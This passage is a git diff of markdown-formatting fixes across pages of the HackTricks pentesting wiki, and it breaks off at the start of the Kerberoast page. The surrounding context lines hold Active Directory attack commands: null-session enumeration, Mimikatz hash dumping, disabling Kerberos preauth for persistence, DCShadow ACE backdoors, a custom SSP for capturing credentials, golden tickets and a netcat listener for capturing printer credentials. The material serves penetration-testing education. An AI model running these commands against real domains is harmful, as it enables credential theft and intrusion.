-Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes **(a text box can be hiding other text boxes):
+Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes** (a text box can be hiding other text boxes):
 
 ![](<../.gitbook/assets/image (374).png>)
diff --git a/search-exploits.md b/search-exploits.md
index f0430aec..178552f5 100644
--- a/search-exploits.md
+++ b/search-exploits.md
@@ -2,9 +2,9 @@
 
 ### Browser
 
-Always search in "google" or others: **\<service_name> \[version] exploit**
+Always search in "google" or others: **\<service\_name> \[version] exploit**
 
-You should also try the **shodan** **exploit search **from [https://exploits.shodan.io/](https://exploits.shodan.io).
+You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).
 
 ### Searchsploit
 
diff --git a/shells/shells/linux.md b/shells/shells/linux.md
index b4101844..2a0ffb0b 100644
--- a/shells/shells/linux.md
+++ b/shells/shells/linux.md
@@ -1,10 +1,10 @@
 # Shells - Linux
 
-**If you have questions about any of these shells you could check them with **[**https://explainshell.com/**](https://explainshell.com)****
+**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)****
 
 ## Full TTY
 
-**Once you get a reverse shell**[** read this page to obtain a full TTY**](full-ttys.md)**.**
+**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
 
 ## Bash | sh
 
diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md
index 797a2dab..8498b9e7 100644
--- a/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/stealing-sensitive-information-disclosure-from-a-web.md
@@ -1,6 +1,6 @@
 # Stealing Sensitive Information Disclosure from a Web
 
-If at some point you find a** web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
+If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
 Here I present you the main ways to can try to achieve it:
 
 * [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md
index a2fdbcf9..0b535610 100644
--- a/windows/active-directory-methodology/README.md
+++ b/windows/active-directory-methodology/README.md
@@ -2,11 +2,11 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
 ## Basic overview
 
@@ -47,7 +47,7 @@ You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io) to
 
 If you just have access to an AD environment but you don't have any credentials/sessions you could:
 
-* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them (for example, [printers could be very interesting targets](ad-information-in-printers.md)**. Take a look to the General **[**Pentesting Methodology**](../../pentesting-methodology.md) to find more information about how to do this.
+* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them (for example, [printers could be very interesting targets](ad-information-in-printers.md)**. Take a look to the General** [**Pentesting Methodology**](../../pentesting-methodology.md) to find more information about how to do this.
 * **Check for null and Guest access on smb services** (this won't work on modern Windows versions):
   * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
   * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
@@ -112,7 +112,7 @@ You can know that a **user account** is being used as a **service** because the
 ### Local Privilege Escalation
 
 If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally**. This is because only with admin privileges you will be able to **dump hashes of other users** in memory (LSASS) and locally (SAM).\
-There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a [**checklist**](../checklist-windows-privilege-escalation.md)**. Also, don't forget to use **[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
+There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a [**checklist**](../checklist-windows-privilege-escalation.md)**. Also, don't forget to use** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
 
 ### Win-RM
 
diff --git a/windows/active-directory-methodology/acl-persistence-abuse.md b/windows/active-directory-methodology/acl-persistence-abuse.md
index 9ebd65fe..f5439b39 100644
--- a/windows/active-directory-methodology/acl-persistence-abuse.md
+++ b/windows/active-directory-methodology/acl-persistence-abuse.md
@@ -1,12 +1,12 @@
 # Abusing Active Directory ACLs/ACEs
 
-**This information was copied from **[**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)** because it's just perfect**
+**This information was copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
 
 ## Context
 
 This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
 
-Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). 
+Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc).&#x20;
 
 An example of ACEs for the "Domain Admins" securable object can be seen here:
 
@@ -167,8 +167,8 @@ rpcclient -U KnownUsername 10.10.10.192
 More info:
 
 * [https://malicious.link/post/2017/reset-ad-user-password-with-linux/](https://malicious.link/post/2017/reset-ad-user-password-with-linux/)
-* [https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN)
-* [https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/e28bf420-8989-44fb-8b08-f5a7c2f2e33c](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/e28bf420-8989-44fb-8b08-f5a7c2f2e33c)
+* [https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN)
+* [https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-samr/e28bf420-8989-44fb-8b08-f5a7c2f2e33c](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-samr/e28bf420-8989-44fb-8b08-f5a7c2f2e33c)
 
 ## WriteOwner on Group
 
@@ -260,10 +260,10 @@ Set-Acl -Path $path -AclObject $acl
 
 ## **Replication on the domain (DCSync)**
 
-The **DCSync **permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All **and **Replicating Directory Changes In Filtered Set**.\
+The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\
 [**Learn more about the DCSync attack here.**](dcsync.md)****
 
-## GPO Delegation <a href="gpo-delegation" id="gpo-delegation"></a>
+## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
 
 Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
 
@@ -281,7 +281,7 @@ The below indicates that the user `offense\spotless` has **WriteProperty**, **Wr
 
 ****[**More about general AD ACL/ACE abuse here.**](acl-persistence-abuse.md)****
 
-### Abusing the GPO Permissions <a href="abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
+### Abusing the GPO Permissions <a href="#abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
 
 We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
 
@@ -295,7 +295,7 @@ Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityRefere
 
 ![](../../.gitbook/assets/a16.png)
 
-#### Computers with a Given Policy Applied <a href="computers-with-a-given-policy-applied" id="computers-with-a-given-policy-applied"></a>
+#### Computers with a Given Policy Applied <a href="#computers-with-a-given-policy-applied" id="computers-with-a-given-policy-applied"></a>
 
 We can now resolve the computer names the GPO `Misconfigured Policy` is applied to:
 
@@ -305,7 +305,7 @@ Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -A
 
 ![](../../.gitbook/assets/a17.png)
 
-#### Policies Applied to a Given Computer <a href="policies-applied-to-a-given-computer" id="policies-applied-to-a-given-computer"></a>
+#### Policies Applied to a Given Computer <a href="#policies-applied-to-a-given-computer" id="policies-applied-to-a-given-computer"></a>
 
 ```
 Get-DomainGPO -ComputerIdentity ws01 -Properties Name, DisplayName
@@ -313,7 +313,7 @@ Get-DomainGPO -ComputerIdentity ws01 -Properties Name, DisplayName
 
 ![](https://blobs.gitbook.com/assets%2F-LFEMnER3fywgFHoroYn%2F-LWNAqc8wDhu0OYElzrN%2F-LWNBOmSsNrObOboiT2E%2FScreenshot%20from%202019-01-16%2019-44-19.png?alt=media\&token=34332022-c1fc-4f97-a7e9-e0e4d98fa8a5)
 
-#### OUs with a Given Policy Applied <a href="ous-with-a-given-policy-applied" id="ous-with-a-given-policy-applied"></a>
+#### OUs with a Given Policy Applied <a href="#ous-with-a-given-policy-applied" id="ous-with-a-given-policy-applied"></a>
 
 ```
 Get-DomainOU -GPLink "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" -Properties DistinguishedName
@@ -321,7 +321,7 @@ Get-DomainOU -GPLink "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" -Properties Distin
 
 ![](https://blobs.gitbook.com/assets%2F-LFEMnER3fywgFHoroYn%2F-LWNAqc8wDhu0OYElzrN%2F-LWNBtLT332kTVDzd5qV%2FScreenshot%20from%202019-01-16%2019-46-33.png?alt=media\&token=ec90fdc0-e0dc-4db0-8279-cde4720df598)
 
-#### Abusing Weak GPO Permissions <a href="abusing-weak-gpo-permissions" id="abusing-weak-gpo-permissions"></a>
+#### Abusing Weak GPO Permissions <a href="#abusing-weak-gpo-permissions" id="abusing-weak-gpo-permissions"></a>
 
 One of the ways to abuse this misconfiguration and get code execution is to create an immediate scheduled task through the GPO like so:
 
@@ -335,13 +335,13 @@ The above will add our user spotless to the local `administrators` group of the
 
 ![](../../.gitbook/assets/a20.png)
 
-### Force Policy Update <a href="force-policy-update" id="force-policy-update"></a>
+### Force Policy Update <a href="#force-policy-update" id="force-policy-update"></a>
 
 ScheduledTask and its code will execute after the policy updates are pushed through (roughly each 90 minutes), but we can force it with `gpupdate /force` and see that our user `spotless` now belongs to local administrators group:
 
 ![](../../.gitbook/assets/a21.png)
 
-### Under the hood <a href="under-the-hood" id="under-the-hood"></a>
+### Under the hood <a href="#under-the-hood" id="under-the-hood"></a>
 
 If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
 
@@ -410,7 +410,7 @@ Below is the XML file that got created by `New-GPOImmediateTask` that represents
 ```
 {% endcode %}
 
-### Users and Groups <a href="users-and-groups" id="users-and-groups"></a>
+### Users and Groups <a href="#users-and-groups" id="users-and-groups"></a>
 
 The same privilege escalation could be achieved by abusing the GPO Users and Groups feature. Note in the below file, line 6 where the user `spotless` is added to the local `administrators` group - we could change the user to something else, add another one or even add the user to another group/multiple groups since we can amend the policy configuration file in the shown location due to the GPO delegation assigned to our user `spotless`:
 
diff --git a/windows/active-directory-methodology/ad-information-in-printers.md b/windows/active-directory-methodology/ad-information-in-printers.md
index 294c1b9a..899b9c65 100644
--- a/windows/active-directory-methodology/ad-information-in-printers.md
+++ b/windows/active-directory-methodology/ad-information-in-printers.md
@@ -1,18 +1,18 @@
 # AD information in printers
 
-There are several blogs in the Internet which** highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
+There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
 This is because an attacker could **trick the printer to authenticate against a rouge LDAP server** (typically a `nc -vv -l -p 444` is enough) and to capture the printer **credentials on clear-text**.
 
-Also, several printers will contains** logs with usernames** or could even be able to **download all usernames **from the Domain Controller.
+Also, several printers will contains **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
 
-All this **sensitive information** and the common** lack of security **makes printers very interesting for attackers.
+All this **sensitive information** and the common **lack of security** makes printers very interesting for attackers.
 
 Some blogs about the topic:
 
 * [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
 * [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
 
-**The following information was copied from **[**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)****
+**The following information was copied from** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)****
 
 ## LDAP settings
 
@@ -289,7 +289,7 @@ Once you have installed and configured your LDAP service you can run it with the
 
 The screen shot below shows an example of the output when we run the connection test on the printer. As you can see the username and password are passed from the LDAP client to server.
 
-![slapd terminal output containing the username "MyUser" and password "MyPassword"](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd_output.png?resize=474%2C163\&ssl=1)
+![slapd terminal output containing the username "MyUser" and password "MyPassword"](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd\_output.png?resize=474%2C163\&ssl=1)
 
 ## How bad can it be?
 
diff --git a/windows/active-directory-methodology/asreproast.md b/windows/active-directory-methodology/asreproast.md
index f8604438..ac579c26 100644
--- a/windows/active-directory-methodology/asreproast.md
+++ b/windows/active-directory-methodology/asreproast.md
@@ -2,11 +2,11 @@
 
 ## ASREPRoast
 
-The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT_REQ_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
+The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
 
-That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
+That means that anyone can send an AS\_REQ request to the DC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
 
-Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain.** Otherwise usernames have to be guessed**.
+Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
 
 #### Enumerating vulnerable users (need domain credentials)
 
@@ -14,7 +14,7 @@ Furthermore, **no domain account is needed to perform this attack**, only connec
 Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 ```
 
-#### Request AS_REP message
+#### Request AS\_REP message
 
 {% code title="Using Linux" %}
 ```bash
@@ -41,7 +41,7 @@ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
 
 ### Persistence
 
-Force **preauth **not required for a user where you have **GenericAll **permissions (or permissions to write properties):
+Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
 
 ```bash
 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
diff --git a/windows/active-directory-methodology/bloodhound.md b/windows/active-directory-methodology/bloodhound.md
index 9e4d1768..3140d254 100644
--- a/windows/active-directory-methodology/bloodhound.md
+++ b/windows/active-directory-methodology/bloodhound.md
@@ -12,15 +12,15 @@
 
 So, [Bloodhound ](https://github.com/BloodHoundAD/BloodHound)is an amazing tool which can enumerate a domain automatically, save all the information, find possible privilege escalation paths and show all the information using graphs.
 
-Booldhound is composed of 2 main parts: The **ingestors **and the **visualisation application**.\
-The **ingestors **are called SharpHound and are the applications (PS1 and C# exe) used to **enumerate the domain and extract all the information **in a format that the visualisation application will understand.\
+Booldhound is composed of 2 main parts: The **ingestors** and the **visualisation application**.\
+The **ingestors** are called SharpHound and are the applications (PS1 and C# exe) used to **enumerate the domain and extract all the information** in a format that the visualisation application will understand.\
 The **visualisation application uses neo4j** to show how all the information is related and to show different ways to escalate privileges in the domain.
 
 ## Installation
 
 You can download the [Ingestors from the github](https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors).
 
-To install the visualisation application you will need to install **neo4j **and the **bloodhound application**.\
+To install the visualisation application you will need to install **neo4j** and the **bloodhound application**.\
 The easiest way to do this is just doing:
 
 ```
@@ -28,9 +28,9 @@ apt-get install bloodhound
 ```
 
 But, at the time of this writing, this wont install the latest bloodhound, so you may need to **download a pre-compiled bloodhound latest version** from: [https://github.com/BloodHoundAD/BloodHound/releases](https://github.com/BloodHoundAD/BloodHound/releases) or [compile it from the source](https://github.com/BloodHoundAD/BloodHound/wiki/Building-BloodHound-from-source).\
-You can **download the community version of neo4j **from [here](https://neo4j.com/download-center/#community).
+You can **download the community version of neo4j** from [here](https://neo4j.com/download-center/#community).
 
-**If **you **download **by your own** bloodhound from releases** and n**eo4j from the web** page (instead of using `apt-get`) you will need to **decompress **the downloaded **files **to access the executables.
+**If** you **download** by your own **bloodhound from releases** and n**eo4j from the web** page (instead of using `apt-get`) you will need to **decompress** the downloaded **files** to access the executables.
 
 ## Visualisation app Execution
 
diff --git a/windows/active-directory-methodology/constrained-delegation.md b/windows/active-directory-methodology/constrained-delegation.md
index ed46c6f1..29995510 100644
--- a/windows/active-directory-methodology/constrained-delegation.md
+++ b/windows/active-directory-methodology/constrained-delegation.md
@@ -4,14 +4,14 @@
 
 Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine.
 
-* **Service for User to self (**_**S4U2self**_**): **If a **service account **has a _userAccountControl _value containing [TRUSTED_TO_AUTH_FOR_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.
-* **Service for User to Proxy(**_**S4U2proxy**_**): **A **service account **could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo. **To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
+* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user.
+* **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one.
 
-**Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated _’ in AD, you will **not be able to impersonate** them.
+**Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them.
 
-This means that if you **compromise the hash of the service** you can **impersonate users **and obtain **access **on their behalf to the **service configured **(possible **privesc**).\
-Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one **(because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service **you can also have access to** HOST service**.\
-Moreover, notice that if you have access to** LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
+This means that if you **compromise the hash of the service** you can **impersonate users** and obtain **access** on their behalf to the **service configured** (possible **privesc**).\
+Also, you **won't only have access to the service that user is able to impersonate, but also to any service that uses the same account as the allowed one** (because the SPN is not being checked, only privileges). For example, if you have access to **CIFS service** you can also have access to **HOST service**.\
+Moreover, notice that if you have access to **LDAP service on DC**, you will have enough privileges to exploit a **DCSync**.
 
 {% code title="Enumerate from Powerview" %}
 ```bash
diff --git a/windows/active-directory-methodology/custom-ssp.md b/windows/active-directory-methodology/custom-ssp.md
index eb0e579e..252cbbd7 100644
--- a/windows/active-directory-methodology/custom-ssp.md
+++ b/windows/active-directory-methodology/custom-ssp.md
@@ -3,12 +3,12 @@
 ## Custom SSP
 
 [Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
-You can create you **own SSP **to **capture** in **clear text **the **credentials **used to access the machine.
+You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
 
 #### Mimilib
 
 You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
-****Drop the dll in** **`C:\Windows\System32\`\
+****Drop the dll in **** `C:\Windows\System32\`\
 Get a list existing LSA Security Packages:
 
 {% code title="attacker@target" %}
diff --git a/windows/active-directory-methodology/dcshadow.md b/windows/active-directory-methodology/dcshadow.md
index e253e861..79b24433 100644
--- a/windows/active-directory-methodology/dcshadow.md
+++ b/windows/active-directory-methodology/dcshadow.md
@@ -2,7 +2,7 @@
 
 ## DCShadow
 
-It registers a **new Domain Controller **in the AD and uses it to **push attributes **(SIDHistory, SPNs...) on specified objects **without **leaving any **logs **regarding the **modifications**. You **need DA **privileges and be inside the **root domain**.\
+It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
 Note that if you use wrong data, pretty ugly logs will appear.
 
 To perform the attack you need 2 mimikatz instances. One of them will start the RPC servers with SYSTEM privileges (you have to indicate here the changes you want to perform), and the other instance will be used to push the values:
@@ -30,15 +30,15 @@ You can push the changes from a DA or from a user with this minimal permissions:
   * _DS-Install-Replica_ (Add/Remove Replica in Domain)
   * _DS-Replication-Manage-Topology_ (Manage Replication Topology)
   * _DS-Replication-Synchronize_ (Replication Synchornization)
-* The **Sites object **(and its children) in the **Configuration container**: 
+* The **Sites object** (and its children) in the **Configuration container**:&#x20;
   * _CreateChild and DeleteChild_
 * The object of the **computer which is registered as a DC**:
-  * _WriteProperty _(Not Write)
+  * _WriteProperty_ (Not Write)
 * The **target object**:
   * _WriteProperty_ (Not Write)
 
-You can use** **[**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
-For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose`  This means that the username _**student1 **_when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
+You can use **** [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
+For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose`  This means that the username _**student1**_ when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
 
 ### Using DCShadow to create backdoors
 
@@ -72,12 +72,12 @@ We need to append following ACEs with our user's SID at the end:
   * `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
   * `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
 * On the attacker computer object: `(A;;WP;;;UserSID)`
-* On the target user object:` (A;;WP;;;UserSID)`
+* On the target user object: `(A;;WP;;;UserSID)`
 * On the Sites object in Configuration container: `(A;CI;CCDC;;;UserSID)`
 
 To get the current ACE of an object: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
 
-Notice that in this case you need to make **several changes, **not just one. So, in the **mimikatz1 session **(RPC server) use the parameter **`/stack` with each change** you want to make. This way, you will only need to **`/push`** one time to perform all the stucked changes in the rouge server.
+Notice that in this case you need to make **several changes,** not just one. So, in the **mimikatz1 session** (RPC server) use the parameter **`/stack` with each change** you want to make. This way, you will only need to **`/push`** one time to perform all the stucked changes in the rouge server.
 
 
 
diff --git a/windows/active-directory-methodology/dsrm-credentials.md b/windows/active-directory-methodology/dsrm-credentials.md
index 2781b673..9ea46b10 100644
--- a/windows/active-directory-methodology/dsrm-credentials.md
+++ b/windows/active-directory-methodology/dsrm-credentials.md
@@ -2,8 +2,8 @@
 
 ## DSRM Credentials
 
-There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password **so you can remotely access to this local Administrator user.\
-First we need to **dump **the **hash **of the **local Administrator **user inside the DC:
+There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
+First we need to **dump** the **hash** of the **local Administrator** user inside the DC:
 
 ```bash
 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
diff --git a/windows/active-directory-methodology/golden-ticket.md b/windows/active-directory-methodology/golden-ticket.md
index 8b9e8e6d..ee253f59 100644
--- a/windows/active-directory-methodology/golden-ticket.md
+++ b/windows/active-directory-methodology/golden-ticket.md
@@ -2,9 +2,9 @@
 
 ## Golden ticket
 
-A valid **TGT as any user **can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user.
+A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user.
 
-The **krbtgt **account **NTLM hash** can be **obtained **from the **lsass process** or from the **NTDS.dit file **of any DC in the domain. It is also possible to get that NTLM through a **DCsync attack**, which can be performed either with the [lsadump::dcsync](https://github.com/gentilkiwi/mimikatz/wiki/module-\~-lsadump) module of Mimikatz or the impacket example [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). Usually, **domain admin privileges or similar are required**, no matter what technique is used.
+The **krbtgt** account **NTLM hash** can be **obtained** from the **lsass process** or from the **NTDS.dit file** of any DC in the domain. It is also possible to get that NTLM through a **DCsync attack**, which can be performed either with the [lsadump::dcsync](https://github.com/gentilkiwi/mimikatz/wiki/module-\~-lsadump) module of Mimikatz or the impacket example [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). Usually, **domain admin privileges or similar are required**, no matter what technique is used.
 
 {% code title="From Linux" %}
 ```bash
@@ -22,7 +22,7 @@ klist #List tickets in memory
 ```
 {% endcode %}
 
-**Once **you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec **or **wmiexec **to obtain a shell (looks like yo can not get a shell via winrm).
+**Once** you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell (looks like yo can not get a shell via winrm).
 
 ### Mitigation
 
diff --git a/windows/active-directory-methodology/kerberoast.md b/windows/active-directory-methodology/kerberoast.md
index 406b8471..ed4616ab 100644
--- a/windows/active-directory-methodology/kerberoast.md
+++ b/windows/active-directory-methodology/kerberoast.md
@@ -2,7 +2,7 @@
 
 ## Kerberoast
 
